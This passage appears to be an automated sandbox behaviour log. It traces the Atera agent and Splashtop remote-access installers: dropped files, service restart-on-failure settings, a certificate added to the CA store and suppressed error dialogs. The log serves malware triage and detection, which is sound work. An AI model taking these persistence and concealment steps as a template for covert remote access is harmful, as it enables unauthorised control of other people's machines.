                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\ISRT.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA0BF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDCAB.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\_isE656.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI172D.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\ISRT.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF3E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6738.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC672.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B7C5EA94-B96A-41F5-BE95-25D78B486678}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F94.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFB85.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9FF2.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\ISRT.dllJump to dropped file
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeFile created: C:\Windows\Temp\unpack\libcrypto-3.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDEEF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6833.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF4AD.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\_isFD6A.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\Temp\SplashtopStreamer.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0C6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5CE.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B72.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\ISRT.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeFile created: C:\Windows\Temp\unpack\libssl-3.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\system32\SRCredentialProvider.dll (copy)Jump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BBD793 __EH_prolog3_GS,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileIntW,37_2_00BBD793
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\LICENSE.txtJump to behavior

                                Boot Survival

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splashtop Remote\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splashtop Remote\Splashtop Streamer.lnk
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0040C4FA IsIconic,GetWindowPlacement,GetWindowRect,36_2_0040C4FA
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BB5BC9 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,37_2_00BB5BC9
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
